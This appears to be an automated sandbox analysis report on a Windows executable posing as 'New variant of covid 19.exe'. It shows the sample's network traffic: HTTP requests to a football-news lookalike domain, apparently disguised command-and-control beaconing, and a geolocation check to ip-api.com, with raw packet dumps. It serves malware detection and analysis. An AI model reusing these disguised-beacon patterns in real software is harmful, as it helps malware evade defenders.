                                                                        Version Infos

                                                                        Description       Data
                                                                        LegalCopyright    2016 IVXyhTJ WpOPFrinT
                                                                        Assembly Version  7.4240.7372.1
                                                                        InternalName      YNcegbh OAaEntXrDdbrC.exe
                                                                        FileVersion       0.2750.8344.3
                                                                        CompanyName       DdUPmLN kgoHVaSIjqNjSlvYSOE
                                                                        LegalTrademarks   Wfogltd FP
                                                                        Comments          FYpxhRj B
                                                                        ProductName       YNcegbh OAaEntXrDdbrC
                                                                        ProductVersion    7.4240.7372.1
                                                                        FileDescription   TeoRASq IJuqUHUDfjEOiPmPQpOhSr
                                                                        OriginalFilename  YNcegbh OAaEntXrDdbrC.exe
                                                                        Translation       0x0409 0x04e4

                                                                        Possible Origin

                                                                        Language of compilation system  Country where language is spoken  Map
                                                                        English                         United States

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        Timestamp                           Source Port  Dest Port  Source IP     Dest IP
                                                                        Mar 9, 2021 22:18:42.739552975 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:42.777909040 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:42.778614044 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:42.779385090 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:42.819833040 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994386911 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994452953 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994492054 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994530916 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994538069 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:42.994570017 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994610071 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994611025 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:42.994672060 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:42.994721889 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.157305002 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.157370090 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.157445908 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.157476902 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.157486916 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.157541990 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.158030987 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.158071041 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.158138037 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.158961058 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.158999920 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.159061909 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.159918070 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.159960985 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.160022020 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.160876036 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.160931110 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.161003113 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.161834955 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.161879063 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.161942005 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.162772894 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.162811041 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.162890911 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.163723946 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.163765907 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.163832903 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.164681911 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.164725065 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.164786100 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.165640116 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.165682077 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.165738106 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.166594028 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.166635990 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.166697979 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.167562008 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.167604923 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.167684078 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.168509960 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.168546915 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.168603897 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.169465065 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.169507980 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.170411110 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.170449018 CET  80           49710      104.21.31.39  192.168.2.3
                                                                        Mar 9, 2021 22:18:43.170484066 CET  49710        80         192.168.2.3   104.21.31.39
                                                                        Mar 9, 2021 22:18:43.170522928 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.171349049 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.171389103 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.171451092 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.172344923 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.172385931 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.172451973 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.173280954 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.195693016 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.195745945 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.195775986 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.196089029 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.196130991 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.196190119 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.197019100 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.197062969 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.197123051 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.197988033 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.198029995 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.198093891 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.198921919 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.198970079 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.199039936 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.199919939 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.199958086 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.200022936 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.200845957 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.200886965 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.200973034 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.201809883 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.201852083 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.201919079 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.202758074 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.202800989 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.202872992 CET4971080192.168.2.3104.21.31.39
                                                                        Mar 9, 2021 22:18:43.203722000 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.204153061 CET8049710104.21.31.39192.168.2.3
                                                                        Mar 9, 2021 22:18:43.204190969 CET8049710104.21.31.39192.168.2.3

UDP Packets


                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass

                                                                        DNS Answers

                                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class

                                                                        HTTP Request Dependency Graph

                                                                        • liverpoolofcfanclub.com
                                                                        • ip-api.com

                                                                        HTTP Packets

                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        0 | 192.168.2.3 | 49710 | 104.21.31.39 | 80 | C:\Users\user\Desktop\New variant of covid 19.exe

                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Mar 9, 2021 22:18:42.779385090 CET | 1159 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Connection: Keep-Alive
                                                                        Mar 9, 2021 22:18:42.994386911 CET | 1160 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:18:42 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=dd3d659350d4364270ba956ac797122da1615324722; expires=Thu, 08-Apr-21 21:18:42 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:12 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba744e7a00004aa95698b000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RNmhjYMm4chRd3U8zb6zpNvEo4CGdr945W1ZjWKWz5irYfyoWUf0eqW%2FJNhnUVoHvBWu8IC1EKbsTquHArEHJvHyB27Y%2BQp1OYYuDM%2Bc4tlEpi%2Fhk8YD8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d7565d9cfc4aa9-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Ascii: 1553<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnec
                                                                        Mar 9, 2021 22:18:43.525305033 CET | 2452 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:18:43.737683058 CET | 2454 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:18:43 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=d1fd105031d6ef597105a551fadf09a981615324723; expires=Thu, 08-Apr-21 21:18:43 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:15 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74516400004aa959b7c000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=F1w0i8435sI5Gl4dPt%2B0F%2BY4xNOjRcQeiaA9j9U%2FJFvfyn6B0oXeYqhmo8iB1LxKV%2BOcVZiALzTGhVmDMNdrwZqlBgRx9MjyuJkeESKets4dsHPWDAbzVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d756623cbe4aa9-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnec
                                                                        Mar 9, 2021 22:18:46.385265112 CET | 3782 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:18:46.596021891 CET | 3783 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:18:46 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=d74610539bf3d562685b6ac61ad27b71b1615324726; expires=Thu, 08-Apr-21 21:18:46 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:17 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba745c8f00004aa99f1df000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ptJIvG5ecSB4LWIE2exi5oeE7NX1AVjB1OITPNBfq%2BCBK%2BVGH4c6SmJyun%2FpPq65FFryoyTK76rM%2Bdks27vIjozKPSwJY8ef%2F3KRuO8CM9Ub1%2BMffvzk0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d756741b864aa9-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Ascii: 157b<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preco


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.349715208.95.112.180C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Mar 9, 2021 22:19:02.418761015 CET | 4516 | OUT | GET /json/ HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Mar 9, 2021 22:19:02.470841885 CET | 4517 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:02 GMT
                                                                        Content-Type: application/json; charset=utf-8
                                                                        Content-Length: 281
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 60
                                                                        X-Rl: 44
                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 31 35 32 22 2c 22 6c 61 74 22 3a 34 37 2e 34 33 2c 22 6c 6f 6e 22 3a 38 2e 35 37 31 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 43 64 6e 37 37 20 5a 55 52 20 49 54 58 22 2c 22 61 73 22 3a 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 37 38 22 7d
                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8152","lat":47.43,"lon":8.5718,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Cdn77 ZUR ITX","as":"AS60068 Datacamp Limited","query":"84.17.52.78"}


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        2 | 192.168.2.3 | 49720 | 104.21.31.39 | 80 | C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Mar 9, 2021 22:19:12.096379042 CET | 4548 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Connection: Keep-Alive
                                                                        Mar 9, 2021 22:19:12.311244965 CET | 4550 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:12 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=daa2b8247d04f361e15db06e6ca9806251615324752; expires=Thu, 08-Apr-21 21:19:12 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:12 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74c0fe0000c29f87833000000001
                                                                        Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=EtFzX1WwI%2F4q7f3SPMP%2FXe97dg8flR7L0SosQijHDladtZHxDD1DA2lPv8FK7Y%2Fpt9QjimxjqdIWbN4qlyjgLHiC3qdmn0gQy95RiYL82lNJKfGoJXeWRQ%3D%3D"}]}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d75714ce5ec29f-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect"
                                                                        Mar 9, 2021 22:19:12.858704090 CET | 5840 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:19:13.072628021 CET | 5841 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:13 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=daa2b8247d04f361e15db06e6ca9806251615324752; expires=Thu, 08-Apr-21 21:19:12 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:15 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74c3fa0000c29f3829f000000001
                                                                        Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2APrtI3BM9BVRBjzcHfWmuYJRmfLDGH4SuOukxAXNsenbkPWs%2FVElbahvP3M5wFiob74YwcHcyNSGJYMKegIqZoIniU3Y71SgNh%2Fodgynzzadyo4LOQlZw%3D%3D"}]}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d757198bb6c29f-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" h
                                                                        Mar 9, 2021 22:19:19.530019045 CET | 7154 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:19:20.795794964 CET | 7164 | IN | HTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:20 GMT
                                                                        Content-Type: text/html
